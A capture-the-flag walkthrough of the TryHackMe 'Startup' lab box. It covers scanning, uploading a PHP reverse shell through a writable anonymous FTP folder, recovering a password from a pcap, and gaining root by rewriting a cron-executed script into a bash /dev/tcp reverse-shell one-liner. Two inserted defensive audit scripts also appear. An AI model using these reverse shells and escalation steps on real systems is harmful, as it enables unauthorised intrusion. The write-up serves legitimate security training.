TryHackMe: Startup
Not much to say about this Startup room; it’s fun but simple, very appropriate to its level, and you can learn a thing or two. Besides that, it counts as another step to becoming better every day.
https://tryhackme.com/room/startup
Initial Enumeration
Nmap Scan
We start with our nmap scan:
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- --min-rate 1000 --max-retries 3 10.10.142.146
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 13:59 BST
Warning: 10.10.142.146 giving up on port because retransmission cap hit (3).
Nmap scan report for 10.10.142.146
Host is up (0.058s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to -
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.86 seconds
FTP
At first glance nothing catches the eye, so we log into FTP to read the contents of the files inside:
┌──(kali㉿kali)-[~/Desktop]
└─$ ftp 10.10.142.146
Connected to 10.10.142.146.
220 (vsFTPd 3.0.3)
Name (10.10.142.146:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||14856|)
150 Here comes the directory listing.
drwxr-xr-x 3 65534 65534 4096 Nov 12 2020 .
drwxr-xr-x 3 65534 65534 4096 Nov 12 2020 ..
-rw-r--r-- 1 0 0 5 Nov 12 2020 .test.log
drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp
-rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
226 Directory send OK.
ftp> get important.jpg
local: important.jpg remote: important.jpg
229 Entering Extended Passive Mode (|||64797|)
150 Opening BINARY mode data connection for important.jpg (251631 bytes).
100% |***********************************************************************************************| 245 KiB 1.04 MiB/s 00:00 ETA
226 Transfer complete.
251631 bytes received in 00:00 (861.65 KiB/s)
ftp> get notice.txt
local: notice.txt remote: notice.txt
229 Entering Extended Passive Mode (|||55069|)
150 Opening BINARY mode data connection for notice.txt (208 bytes).
100% |***********************************************************************************************| 208 445.44 KiB/s 00:00 ETA
226 Transfer complete.
208 bytes received in 00:00 (3.55 KiB/s)
ftp>
Web 80
Looking at notice.txt, there is something that hints at their website. To check this, we first navigate to their website:
Gobuster Scan
Nothing on the main page, and nothing in the source code, so our next step is a gobuster scan:
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -x ".txt,.html,.php" -t 25 --timeout 20s -u http://10.10.142.146
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.142.146
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,php
[+] Timeout: 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/files (Status: 301) [Size: 314] [--> http://10.10.142.146/files/]
/index.html (Status: 200) [Size: 808]
/server-status (Status: 403) [Size: 278]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================
Navigating to the newly found directory called files, we see the FTP files and the other folder:
Shell as www-data
If we look back at the nmap scan, we see that the ftp folder is writable, and since it’s being hosted on their web server, we can upload a reverse shell to the ftp folder to gain access to the server.
The first step is to upload a PHP reverse shell to the ftp folder:
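Before going further, here is the check a defender would run against exactly this exposure. It is an added example, not part of the original write-up: a small POSIX shell script that reads the vsftpd directives that allow anonymous uploads and tests whether the anonymous FTP root sits inside the web server’s DocumentRoot, so that anything uploaded over FTP is also served (and, for .php, executed) over HTTP. The config path and DocumentRoot are parameters; the value /var/www/html/files used in the comments is inferred from the cp command later in the write-up.

```shell
#!/bin/sh
# Added example (not from the original write-up). Flags the combination seen
# on this box: vsftpd permits anonymous uploads AND the anonymous root lives
# under the HTTP DocumentRoot, so an uploaded .php file is reachable by URL.
# Directive names (anonymous_enable, write_enable, anon_upload_enable,
# anon_root) are real vsftpd options; paths are assumptions.

# vsftpd_value CONF KEY -> prints the last value set for KEY, or nothing.
vsftpd_value() {
    sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*\(.*[^[:space:]]\)[[:space:]]*$/\1/p" "$1" \
        | tail -n 1
}

# check_ftp_web_overlap VSFTPD_CONF DOCROOT
# Returns 1 (and prints why) when anonymous users can write AND the anonymous
# root is DOCROOT itself or a directory below it. Returns 0 otherwise.
check_ftp_web_overlap() {
    conf="$1"; docroot="${2%/}"
    anon=$(vsftpd_value "$conf" anonymous_enable   | tr 'a-z' 'A-Z')
    write=$(vsftpd_value "$conf" write_enable      | tr 'a-z' 'A-Z')
    upload=$(vsftpd_value "$conf" anon_upload_enable | tr 'a-z' 'A-Z')
    root=$(vsftpd_value "$conf" anon_root)
    # With anon_root unset, vsftpd stays in the ftp user's home directory.
    [ -n "$root" ] || root=$(getent passwd ftp 2>/dev/null | cut -d: -f6)
    root="${root%/}"
    [ -n "$root" ] || return 0           # cannot determine the root: nothing to compare
    # Anonymous uploads need all three booleans set to YES.
    if [ "$anon" = YES ] && [ "$write" = YES ] && [ "$upload" = YES ]; then
        case "$root" in
            "$docroot"|"$docroot"/*)
                printf 'UNSAFE: anonymous FTP uploads land in %s, which is served by HTTP from %s\n' \
                    "$root" "$docroot"
                return 1 ;;
        esac
    fi
    return 0
}

# Usage (paths are illustrative): check_ftp_web_overlap /etc/vsftpd.conf /var/www/html
if [ -n "${1:-}" ]; then
    check_ftp_web_overlap "$1" "${2:-/var/www/html}"
fi
```

A passing result only says the two settings do not overlap; the fix on a box like this is anon_upload_enable=NO plus an anonymous root outside the web tree.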
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||55507|)
150 Ok to send data.
100% |***********************************************************************************************| 158 1.00 MiB/s 00:00 ETA
226 Transfer complete.
158 bytes sent in 00:00 (1.40 KiB/s)
After that we go to the files directory on the website and open the shell.php file:
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
listening on [any] 4444 ...
connect to [-] from (UNKNOWN) [10.10.142.146] 35678
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:15:29 up 17 min, 0 users, load average: 0.11, 0.16, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Now inside as www-data, we have access to the secret spicy soup recipe:
www-data@startup:/$ ls
bin home lib mnt root srv vagrant
boot incidents lib64 opt run sys var
dev initrd.img lost+found proc sbin tmp vmlinuz
etc initrd.img.old media recipe.txt snap usr vmlinuz.old
www-data@startup:/$ cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
Shell as lennie
Looking around the / directory, we see a folder called incidents, and inside it a .pcapng file. We don’t have the www-data password, so to get around this we copy the file to /var/www/html/files/ftp/ and download it from there:
www-data@startup:/incidents$ cp suspicious.pcapng /var/www/html/files/ftp/
Analyzing the file, we see that it revolves around another reverse shell on port 4444; we can use this to better understand what happened:
We can see that the shell was successful, and scrolling down a bit we also see the person trying a password for www-data, but with no success. The only user with a home directory is lennie, which hints that the password is for lennie instead of www-data:
With the password we can log in as lennie and get the user flag:
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh lennie@10.10.142.146
lennie@10.10.142.146's password:
$ ls
Documents scripts user.txt
$ cat user.txt
THM{REDACTED}
Shell as root
Inside lennie’s home directory are two other folders. Inside Documents we couldn’t find anything useful, but inside scripts was something interesting:
lennie@startup:~/scripts$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 12 2020 .
drwx------ 5 lennie lennie 4096 Apr 10 13:31 ..
-rwxr-xr-x 1 root root 77 Nov 12 2020 planner.sh
-rw-r--r-- 1 root root 1 Apr 10 13:33 startup_list.txt
lennie@startup:~/scripts$ cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
We can’t change this script, but checking /etc/print.sh we see that we own it and can write to it:
lennie@startup:/etc$ ls -lah print.sh
-rwx------ 1 lennie lennie 25 Nov 12 2020 print.sh
To go further we first need to confirm that we actually have a way to exploit this, either through sudo permissions or cron jobs. sudo -l didn’t work and /etc/crontab was empty, so our only hope was pspy. After running it we do find something related to the planner.sh file:
2025/04/10 13:43:01 CMD: UID=0 PID=4526 | /bin/bash /home/lennie/scripts/planner.sh
2025/04/10 13:43:01 CMD: UID=0 PID=4525 | /bin/sh -c /home/lennie/scripts/planner.sh
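The pspy output completes the picture: a root cron job runs planner.sh, which in turn executes /etc/print.sh, a file owned by lennie. As an added example (not from the original write-up), here is a shell audit that walks such a script and flags every referenced path a non-root user could alter, which is the check that would have caught this misconfiguration. It assumes GNU coreutils stat; the paths in the trailing usage line are illustrative.

```shell
#!/bin/sh
# Added example (not from the original write-up). Audits a script run by a
# root cron job and reports every absolute path it references that someone
# other than root could modify. On this box the chain is
# root cron -> /home/lennie/scripts/planner.sh -> lennie-owned /etc/print.sh,
# which is exactly what this flags. Assumes GNU coreutils stat.

# audit_root_script SCRIPT [TRUSTED_UID]
# Prints "FLAG <path> uid=<owner> mode=<octal>" for each unsafe dependency:
# a file not owned by TRUSTED_UID (default 0 = root), or one whose group or
# world write bit is set. Returns 1 if anything was flagged, 0 otherwise.
audit_root_script() {
    script="$1"; trusted_uid="${2:-0}"; flagged=0
    # Every token starting with '/' in the script: the interpreter in the
    # shebang, programs it calls, and redirect targets (a writable output
    # file matters too; startup_list.txt is overwritten by root each run).
    for path in $(grep -oE '/[^[:space:]]+' "$script" | sed 's/[;)&|]*$//' | sort -u); do
        [ -e "$path" ] || continue                 # not present yet: nothing to judge
        owner=$(stat -L -c '%u' "$path")           # -L: judge the symlink target
        mode=$(stat -L -c '%a' "$path")            # e.g. 755 or 1777
        # 022 (octal) masks the group and world write bits.
        if [ "$owner" != "$trusted_uid" ] || [ $(( 0$mode & 022 )) -ne 0 ]; then
            printf 'FLAG %s uid=%s mode=%s\n' "$path" "$owner" "$mode"
            flagged=1
        fi
    done
    return $flagged
}

# Usage (illustrative): audit_root_script /home/lennie/scripts/planner.sh
if [ -n "${1:-}" ]; then
    audit_root_script "$1" "${2:-0}"
fi
```

Run it as root against every script that cron or systemd timers execute as root; anything it flags is a place where a lower-privileged user gets to choose what root runs.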
Since planner.sh runs as root, all we have to do is turn print.sh into a reverse shell and wait for the cron job to run:
#!/bin/bash
/bin/bash -i >& /dev/tcp/-/4444 0>&1
Not even a minute later, we are root and can finally read its flag:
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
listening on [any] 4444 ...
connect to [-] from (UNKNOWN) [10.10.142.146] 35732
bash: cannot set terminal process group (4537): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# ls
root.txt
root@startup:~# cat root.txt
THM{REDACTED}